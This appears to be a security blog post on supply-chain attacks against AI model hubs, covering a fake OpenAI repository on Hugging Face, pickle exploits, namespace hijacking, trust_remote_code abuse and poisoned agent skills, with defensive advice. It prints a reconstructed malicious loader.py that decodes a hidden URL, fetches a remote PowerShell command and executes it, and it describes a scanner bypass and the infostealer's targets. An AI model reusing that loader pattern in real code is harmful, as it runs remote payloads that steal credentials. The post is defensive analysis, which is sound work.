On May 7, 2026, a repository called Open-OSS/privacy-filter appeared on Hugging Face. Within 18 hours, it climbed to the #1 trending position with over 244,000 downloads and 667 likes. The model card was copied word-for-word from OpenAI’s legitimate openai/privacy-filter release. The difference: buried inside was a loader.py that fetched PowerShell commands from a remote server and silently executed an infostealer on every Windows machine that ran it.

With 244,000 download opportunities across 18 hours, the payload’s exposure window was significant — though the full downstream impact remains unknown.

TL;DR

  • Hugging Face hosts 1M+ ML models with an open publishing model and automated vetting — it has become the npm of AI
  • A fake OpenAI repo reached #1 trending with 244K downloads in 18 hours before removal
  • Five distinct attack vectors target AI model repositories: typosquatting, pickle exploits, namespace hijacking, trust_remote_code abuse, and agent skill poisoning
  • Hugging Face’s built-in scanners can be bypassed (attackers use 7z instead of ZIP to evade picklescan)
  • Defense requires active vetting: hash pinning, sandboxed execution, and policy enforcement around trust_remote_code=True

Why This Matters

Hugging Face hosts over one million machine learning models. Virtually every AI company — from startups to Fortune 500 enterprises — pulls models from it daily. The trust is implicit: developers assume that a trending, highly-downloaded model is safe. That assumption is now actively exploited.

This isn’t theoretical. Real payloads designed to steal credentials are being distributed through AI model repositories. If your organization uses any open-source AI model — for inference, fine-tuning, or evaluation — this attack surface is part of your infrastructure.


Hugging Face: The npm of AI

To understand the threat, think of Hugging Face like npm, but for machine learning models instead of JavaScript packages. Developers pull models with a single line of code:

from transformers import AutoModel
# Downloads model weights and config; remote repo code is not executed by default
# Remote Python code only runs if trust_remote_code=True is explicitly set
model = AutoModel.from_pretrained("organization/model-name")

That command downloads model weights and configuration files. By default it does not execute arbitrary remote code — but the model file format itself (pickle) can carry executable payloads, and certain flags like trust_remote_code=True open the door to full code execution. Like npm install, the convenience of a single command masks a complex trust chain.

The JavaScript ecosystem learned this the hard way through years of malicious packages, typosquatting campaigns, and supply chain attacks. Hugging Face is learning the same lesson now, compressed into months rather than years — because the AI ecosystem scaled far faster than its security posture.


Attack Vector 1: Typosquatting and Fake Repositories

How it works: An attacker creates a repository that looks identical to a legitimate, well-known one — copying the name, description, and model card verbatim. They artificially inflate download counts and engagement metrics to push the repository into trending lists, where developers trust it implicitly.

The real case: Open-OSS/privacy-filter impersonated OpenAI’s openai/privacy-filter. The attack had three stages:

  1. The repository copied OpenAI’s model card description word-for-word
  2. Artificial engagement (automated downloads and likes) pushed it to #1 trending within 18 hours
  3. A loader.py file contained the actual malicious payload

The payload used a technique to avoid static detection — it never stored the malicious command locally:

# loader.py (simplified reconstruction of attacker's malicious code)
import subprocess, base64, requests, ssl
# Attacker intentionally disables TLS verification to evade SSL inspection proxies
ssl._create_default_https_context = ssl._create_unverified_context
# The command URL is base64-encoded — static scanners see no obvious URL
url = base64.b64decode("aHR0cHM6Ly9qc29ua2VlcGVyLmNvbS8...").decode()
# Fetch the PowerShell command from a remote JSON document
cmd = requests.get(url).json()["cmd"]
# Execute — the payload never touches disk before running
subprocess.run(["powershell", "-Command", cmd])

The final payload was a full infostealer targeting:

  • Browser data from Chromium and Gecko-based browsers (cookies, saved passwords, history)
  • Discord tokens
  • Cryptocurrency wallet files and seed phrases
  • FileZilla FTP configuration files
  • System screenshots
  • SSH keys and configuration files

HiddenLayer researchers found six additional repositories under the same account, all uploaded on April 24, 2026, suggesting this was part of a broader coordinated supply chain operation.

Detection signals:

  • Repository age vs. download count mismatch — 100K+ downloads on a repository that is three days old
  • Model card description that matches another organization’s release verbatim
  • Presence of loader.py or unusual Python scripts in what claims to be a model repository
  • Outbound connections from ML workload processes to paste sites (jsonkeeper.com, pastebin.com, hastebin.com)
  • PowerShell spawned from a Python interpreter process

MITRE ATT&CK: T1195.002 — Supply Chain Compromise: Compromise Software Supply Chain


Attack Vector 2: Pickle File Exploits

How it works: Many legacy ML model artifacts rely on Python’s pickle serialization — including PyTorch’s .pt and .pth files. Pickle is fundamentally unsafe by design: it can execute arbitrary Python code during deserialization. Loading a malicious pickle file with unsafe settings is functionally equivalent to running a malicious script.

import torch
# PyTorch < 2.6: weights_only defaults to False — unpickles arbitrary Python objects
# PyTorch >= 2.6: defaults to True unless pickle_module is explicitly set
model = torch.load("model.pt")
# Explicit weights_only=True on older versions — restricts to tensors and safe types
model = torch.load("model.pt", weights_only=True)

Hugging Face runs a tool called picklescan to detect malicious pickle files before they reach users. Attackers have already found a working bypass.

The bypass: In coverage of the ReversingLabs/nullifAI research, two malicious models were found stored in PyTorch format but compressed using 7z instead of the ZIP format that PyTorch traditionally uses. That format mismatch prevented normal PyTorch loading and caused Picklescan to miss the embedded payload. Under unsafe deserialization or loader handling, the malicious pickle payload could execute before the load failed.

This means Hugging Face’s primary defense against pickle exploits had a blind spot that was actively abused in the wild.

The safe alternative: The safetensors format was designed specifically to eliminate this class of attack. It stores only tensor data — no executable code, no deserialization hooks. Many major models now offer safetensors alternatives:

# Risky: pickle format, executes arbitrary Python on load
model = torch.load("model.pt")
# Better: weights_only=True significantly narrows the RCE attack surface
# PyTorch docs note this reduces but does not fully eliminate all risks
model = torch.load("model.pt", weights_only=True)
# Best: safetensors format cannot execute code by design — no deserialization hooks
from safetensors.torch import load_file
model_weights = load_file("model.safetensors")

If a model does not offer a safetensors variant, treat it as requiring additional scrutiny before use.


Attack Vector 3: Namespace Hijacking (“AI Jacking”)

How it works: On Hugging Face, models are identified by username/model-name. When a user deletes their account, that namespace — the username — becomes available for re-registration by anyone, including threat actors.

Researchers at Palo Alto Networks Unit 42 identified this attack pattern and named it “model namespace reuse.” Attackers register deleted usernames and upload poisoned versions of previously trusted models. Organizations that reference models by name in their code automatically start downloading the attacker’s version when the original namespace disappears.

The real-world impact was significant. Unit 42 demonstrated the attack successfully against models in both Google Vertex AI Model Garden and Microsoft Azure AI Foundry Model Catalog, achieving reverse shell injection by occupying orphaned namespaces. Legit Security independently discovered the same vulnerability and named it “AI Jacking,” estimating that tens of thousands of developers were potentially affected.

What makes this attack particularly insidious is its passivity: once an attacker claims the namespace, every pipeline that references that model by name is compromised automatically — without the attacker needing to interact with victim systems at all. The legitimate commit history and model card from the original repository may still be partially visible, making the repository appear trustworthy.

Defense — pin by commit hash:

# Vulnerable: pulls whatever is currently at "head" of the branch
model = AutoModel.from_pretrained("organization/model-name")
# Safe: execution requires the repository to match this exact commit
model = AutoModel.from_pretrained(
"organization/model-name",
revision="a7e3b2c1d4f5e6a8b9c0d1e2f3a4b5c6" # verified commit SHA
)

This approach means a namespace takeover cannot silently redirect your pipelines — the commit hash would not match, and the load would fail with an explicit error rather than a silent compromise.


Attack Vector 4: trust_remote_code=True Abuse

How it works: Some Hugging Face models require trust_remote_code=True to load because they include custom Python code in the repository. This flag tells the transformers library to execute whatever Python code exists in the remote repository. It exists for legitimate reasons — some model architectures genuinely cannot be distributed without custom code. But it is a configured backdoor.

CVE-2026-6859 exposed this at scale. InstructLab, a widely used open-source ML training framework, hardcoded trust_remote_code=True in its linux_train.py script. This meant that a specially crafted malicious model uploaded to Hugging Face could achieve remote code execution on any InstructLab user who loaded it — no additional tricks required, no pickle bypass needed.

# What InstructLab was doing internally (simplified):
model = AutoModelForCausalLM.from_pretrained(
model_name,
trust_remote_code=True # Hardcoded — any Python in the repo executes here
)

An attacker simply needed to create a Hugging Face repository containing a Python file with malicious code. That code executed on model load across affected installations.

Defense — audit and restrict:

trust_remote_code=True should be treated with the same severity as executing an arbitrary binary from the internet. Find every instance in your codebase:

Terminal window
grep -r "trust_remote_code=True" . --include="*.py"

Every hit requires manual review of the specific repository being loaded. This parameter should never appear in automated pipelines pointing at externally controlled repositories.

MITRE ATT&CK: T1195.002 — Supply Chain Compromise: Compromise Software Supply Chain


Attack Vector 5: AI Agent Skill Poisoning

As AI agents become mainstream in enterprise environments, the attack surface extends beyond models to agent skills — pre-built capabilities that agents invoke to perform actions like web search, file management, or API integration.

ClawHub, the public registry for OpenClaw’s AI agent skills, was infiltrated by a coordinated campaign called “ClawHavoc.” Attackers planted 341 malicious skills that appeared to provide legitimate functionality while secretly stealing credentials, opening reverse shells, and hijacking AI agents for cryptocurrency mining. Of those, 335 were traced to a single coordinated operation.

This attack differs qualitatively from poisoned models. A malicious model runs when loaded — once, at setup time. A malicious skill runs every time an AI agent invokes it, potentially thousands of times per day across an enterprise deployment. The ongoing execution window is far larger.

For a full breakdown of this incident, see our earlier coverage:

OpenClaw: How the Viral AI Agent Became 2026’s First Major Security Crisis


The Broader Pattern

These attacks are not isolated. In March 2026, the LiteLLM package on PyPI was compromised, potentially exposing 500,000 credentials including API keys for Meta, OpenAI, and Anthropic. The TeamPCP group — responsible for the GitHub breach that compromised 3,800 internal repositories via a poisoned VS Code extension — has demonstrated that developer tooling is the highest-leverage entry point for large-scale intrusions.

The pattern across every incident is identical: trust combined with automation creates attack surface. AI model repositories have both in abundance, and the security maturity of the ecosystem has not kept pace with its explosive adoption.

Attack VectorTargetImpactPlatform Defense Bypass
TyposquattingDevelopers running modelsCredential theft, infostealerTrending algorithm manipulation
Pickle exploitData scientists, notebooksRCE on workstation7z compression evades picklescan
Namespace hijackingAutomated CI/CD pipelinesPersistent RCEOrphaned username re-registration
trust_remote_codeFramework usersRCE on any consumerHardcoded in frameworks (CVE-2026-6859)
Agent skill poisoningAI agent deploymentsPersistent access, crypto miningSkill marketplace trust model

What You Can Do Today

For individual developers:

  1. Prefer safetensors over pickle. If a model does not offer a safetensors variant, treat it as requiring manual inspection before use.
  2. Pin by commit hash. Never reference a model by name alone — always specify a verified revision in production code.
  3. Audit trust_remote_code=True. Every occurrence in your codebase is a potential RCE waiting for a compromised upstream repository.
  4. Inspect repository metadata. A repository with 200K downloads and a creation date three days ago should raise immediate suspicion.

For organizations:

  1. Run an internal model registry. Mirror approved models internally. Pipelines pull from your controlled registry, not directly from Hugging Face. This eliminates namespace hijacking as an attack vector entirely.
  2. Sandbox model loading. Execute untrusted model code in isolated containers with no network access and a restricted filesystem. Legitimate models do not need to make outbound connections during loading.
  3. Monitor ML workload network activity. A model evaluation script connecting to pastebin.com, jsonkeeper.com, or any unexpected external host immediately after model loading is a strong indicator of compromise.
  4. Require security review for new model sources. Treat adding a new Hugging Face model to a pipeline the same as adding a new third-party dependency — with explicit approval and verification.

For security teams:

  1. Add AI supply chain to your threat model. If your organization uses Hugging Face or any open-source model hub, those repositories are part of your attack surface.
  2. Create detection rules for:
    • Python processes making unexpected outbound connections immediately after model loading
    • PowerShell spawned as a child of a Python interpreter
    • Sudden filesystem access across browser profile directories, cryptocurrency wallet paths, or SSH key locations from ML workload processes
    • New Hugging Face model references appearing in CI/CD pipelines without change management records


Sources